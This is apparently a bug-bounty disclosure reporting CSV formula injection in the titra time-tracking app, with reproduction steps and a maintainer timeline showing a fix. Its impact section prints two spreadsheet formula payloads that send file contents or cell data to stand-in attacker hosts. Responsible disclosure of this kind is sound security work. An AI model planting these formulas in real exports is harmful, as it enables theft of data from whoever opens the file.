Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in kromitgmbh/titra

Valid

Reported on

Jun 3rd 2022

Description

Formula Injection/CSV Injection in "Task" due to Improper Neutralization of Formula Elements in CSV File.

Proof of Concept

  1. Click on plus track button
  2. Under the task input field enter the payloads =1+1
  3. Now enter the work hour as 2
  4. Then click on save
  5. Now go to details and click on CSV and the csv will be downloaded.

Video POC

https://drive.google.com/file/d/1AqXmJpt0N5C-6saL59MKxYGLQfM3nE1u/view?usp=sharing

Impact

Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data. On constructing the payloads as

=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1));
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")

An attacker can have access to /etc/passwd system file

References

We are processing your report and will contact the kromitgmbh/titra team within 24 hours. a year ago
We have contacted a member of the kromitgmbh/titra team and are waiting to hear back a year ago
kromitgmbh/titra maintainer validated this vulnerability a year ago
saharshtapi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
kromitgmbh/titra maintainer marked this as fixed in 0.77.0 with commit e606b6 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
kromitgmbh/titra maintainer gave praise a year ago
Thanks for reporting this!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
saharshtapi
a year ago

Researcher

@admin Can you assign CVE?

Jamie Slome
a year ago

Admin

Sorted 👍

to join this conversation